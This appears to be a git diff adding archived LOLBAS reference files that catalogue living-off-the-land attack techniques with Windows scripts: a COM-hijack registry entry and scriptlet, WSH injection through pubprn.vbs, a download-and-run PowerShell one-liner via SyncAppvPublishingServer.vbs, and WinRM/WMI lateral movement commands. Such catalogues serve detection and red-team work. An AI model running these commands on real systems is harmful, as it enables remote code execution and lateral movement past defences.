| @="https://raw.githubusercontent.com/api0cradle/LOLBAS/master/OSScripts/Payload/Slmgr_calc.sct" | ||||
|  | ||||
| [HKEY_CURRENT_USER\Software\Classes\CLSID\{00000001-0000-0000-0000-0000FEEDACDC}\VersionIndependentProgID] | ||||
| @="Scripting.Dictionary" | ||||
							
								
								
									
										22
									
								
								Archive-Old-Version/OSScripts/Payload/Slmgr_calc.sct
									
									
									
									
									
										Normal file
									
								
							
							
						
						
									
										22
									
								
								Archive-Old-Version/OSScripts/Payload/Slmgr_calc.sct
									
									
									
									
									
										Normal file
									
								
							| @@ -0,0 +1,22 @@ | ||||
| <?XML version="1.0"?> | ||||
| <scriptlet> | ||||
|  | ||||
| <registration | ||||
|     description="Scripting.Dictionary" | ||||
|     progid="Scripting.Dictionary" | ||||
|     version="1" | ||||
|     classid="{AAAA1111-0000-0000-0000-0000FEEDACDC}" | ||||
|     remotable="true" | ||||
| 	> | ||||
| </registration> | ||||
|  | ||||
| <script language="JScript"> | ||||
| <![CDATA[ | ||||
|  | ||||
| 		var r = new ActiveXObject("WScript.Shell").Run("calc.exe"); | ||||
| 	 | ||||
| 	 | ||||
| ]]> | ||||
| </script> | ||||
|  | ||||
| </scriptlet> | ||||
							
								
								
									
										19
									
								
								Archive-Old-Version/OSScripts/Pubprn.vbs.md
									
									
									
									
									
										Normal file
									
								
							
							
						
						
									
										19
									
								
								Archive-Old-Version/OSScripts/Pubprn.vbs.md
									
									
									
									
									
										Normal file
									
								
							| @@ -0,0 +1,19 @@ | ||||
| ## Pubprn.vbs | ||||
| * Functions: Execute | ||||
| ``` | ||||
|  | ||||
| pubprn.vbs 127.0.0.1 script:https://domain.com/folder/file.sct | ||||
| Set the 2nd variable with a Script COM moniker to perform Windows Script Host (WSH) Injection. | ||||
| ``` | ||||
|     | ||||
| * Resources:    | ||||
|   * https://enigma0x3.net/2017/08/03/wsh-injection-a-case-study/ | ||||
|   * https://www.slideshare.net/enigma0x3/windows-operating-system-archaeology | ||||
|   * https://github.com/enigma0x3/windows-operating-system-archaeology | ||||
|     | ||||
| * Full path:    | ||||
|   * C:\Windows\System32\Printing_Admin_Scripts\en-US\pubprn.vbs | ||||
|   * C:\Windows\SysWOW64\Printing_Admin_Scripts\en-US\pubprn.vbs | ||||
|     | ||||
| * Notes: Thanks to Matt Nelson - @enigma0x3   | ||||
|     | ||||
							
								
								
									
										18
									
								
								Archive-Old-Version/OSScripts/Slmgr.vbs.md
									
									
									
									
									
										Normal file
									
								
							
							
						
						
									
										18
									
								
								Archive-Old-Version/OSScripts/Slmgr.vbs.md
									
									
									
									
									
										Normal file
									
								
							| @@ -0,0 +1,18 @@ | ||||
| ## Slmgr.vbs | ||||
| * Functions: Execute | ||||
| ``` | ||||
|  | ||||
| reg.exe import c:\path\to\Slmgr.reg & cscript.exe /b c:\windows\system32\slmgr.vbs | ||||
| Hijack the Scripting.Dictionary COM Object to execute remote scriptlet (SCT) code. | ||||
| ``` | ||||
|     | ||||
| * Resources:    | ||||
|   * https://www.slideshare.net/enigma0x3/windows-operating-system-archaeology | ||||
|   * https://www.youtube.com/watch?v=3gz1QmiMhss | ||||
|     | ||||
| * Full path:    | ||||
|   * c:\windows\system32\slmgr.vbs | ||||
|   * c:\windows\sysWOW64\slmgr.vbs | ||||
|     | ||||
| * Notes: Thanks to Matt Nelson - @enigma0x3, Casey Smith - @subTee   | ||||
|     | ||||
| @@ -0,0 +1,17 @@ | ||||
| ## SyncAppvPublishingServer.vbs | ||||
| * Functions: Execute | ||||
| ``` | ||||
|  | ||||
| SyncAppvPublishingServer.vbs "n;((New-Object Net.WebClient).DownloadString('http://some.url/script.ps1') | IEX" | ||||
| Inject PowerShell script code with the provided arguments | ||||
| ``` | ||||
|     | ||||
| * Resources:    | ||||
|   * https://twitter.com/monoxgas/status/895045566090010624 | ||||
|   * https://twitter.com/subTee/status/855738126882316288 | ||||
|     | ||||
| * Full path:    | ||||
|   * C:\Windows\System32\SyncAppvPublishingServer.vbs | ||||
|     | ||||
| * Notes: Thanks to Nick Landers - @monoxgas, Casey Smith - @subTee   | ||||
|     | ||||
							
								
								
									
										27
									
								
								Archive-Old-Version/OSScripts/Winrm.vbs.md
									
									
									
									
									
										Normal file
									
								
							
							
						
						
									
										27
									
								
								Archive-Old-Version/OSScripts/Winrm.vbs.md
									
									
									
									
									
										Normal file
									
								
							| @@ -0,0 +1,27 @@ | ||||
| ## Winrm.vbs | ||||
| * Functions: Execute | ||||
| ``` | ||||
|  | ||||
| reg.exe import c:\path\to\Slmgr.reg & winrm quickconfig | ||||
| Hijack the Scripting.Dictionary COM Object to execute remote scriptlet (SCT) code. | ||||
|  | ||||
| winrm invoke Create wmicimv2/Win32_Process @{CommandLine="notepad.exe"} -r:http://target:5985 | ||||
| Lateral movement/Remote Command Execution via WMI Win32_Process class over the WinRM protocol. | ||||
|  | ||||
| winrm invoke Create wmicimv2/Win32_Service @{Name="Evil";DisplayName="Evil";PathName="cmd.exe /k c:\windows\system32\notepad.exe"} -r:http://acmedc:5985   \nwinrm invoke StartService wmicimv2/Win32_Service?Name=Evil -r:http://acmedc:5985 | ||||
| Lateral movement/Remote Command Execution via WMI Win32_Service class over the WinRM protocol. | ||||
| ``` | ||||
|     | ||||
| * Resources:    | ||||
|   * https://www.slideshare.net/enigma0x3/windows-operating-system-archaeology | ||||
|   * https://www.youtube.com/watch?v=3gz1QmiMhss | ||||
|   * https://github.com/enigma0x3/windows-operating-system-archaeology | ||||
|   * https://redcanary.com/blog/lateral-movement-winrm-wmi/ | ||||
|   * https://twitter.com/bohops/status/994405551751815170 | ||||
|     | ||||
| * Full path:    | ||||
|   * C:\windows\system32\winrm.vbs | ||||
|   * C:\windows\SysWOW64\winrm.vbs | ||||
|     | ||||
| * Notes: Thanks to Matt Nelson - @enigma0x3 (Hijack), Casey Smith - @subtee (Hijack), Red Canary Company cc Tony Lambert - @redcanaryco (Win32_Process LM), Jimmy - @bohops (Win32_Service LM)   | ||||
|     | ||||
Some files were not shown because too many files have changed in this diff Show More
		Reference in New Issue
	
	Block a user